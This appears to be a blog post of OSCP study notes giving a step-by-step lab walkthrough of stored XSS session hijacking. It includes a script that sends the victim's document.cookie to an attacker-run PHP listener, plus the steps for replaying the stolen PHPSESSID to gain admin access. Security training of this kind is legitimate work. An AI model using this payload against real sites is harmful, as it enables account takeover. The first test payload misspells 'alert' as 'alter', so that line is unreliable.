zoukankan      html  css  js  c++  java
  • OSCP Learning Notes

    Cross-Site Scripting(XSS)

     1. Using the tool - netdiscover to find the IP of target server.

    netdiscover

    2.Browser the website http://10.0.0.21 through Firefox.

    3. Click 'Test' . Then write the following script in the text box. 

    <script>alter('XSS')</script>

     

    4.Create the index.php in the root folder.

    <?php
    $cookie = isset($_GET["test"])?$_GET['test']:"";
    ?>

    5. Start the php service.

    service apache2 stop
    php -S 10.0.0.109:80

    6. Write the following script in the text box, then click the "Submit Query" button.

    <script>location.href='http://10.0.0.109/index.php?test='+document.cookie;</script>

     7. Install the Cookie Manager on the Firefox.

     8. Edit the PHPSESSID value in the Cookies Manager tool and change the value to the PHPSESSID showed in Kali Linux terminal. Then save the cookie value.

    9. After change the cookie value - PHPSESSID. Click the 'Admin' buttion, then you can login without username and password. You obtain the administrator privileges.

    相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
  • 相关阅读:
    Django中间件
    cookies与session
    Django Form组件
    Django 自定义分页器
    Django 批量插入数据
    Ajax
    图书管理系统
    Django常用字段及参数、事务、数据库查询优化
    Django之F与Q查询
    课堂测试-统计单词个数和字母出现频率
  • 原文地址:https://www.cnblogs.com/keepmoving1113/p/11210706.html
Copyright © 2011-2022 走看看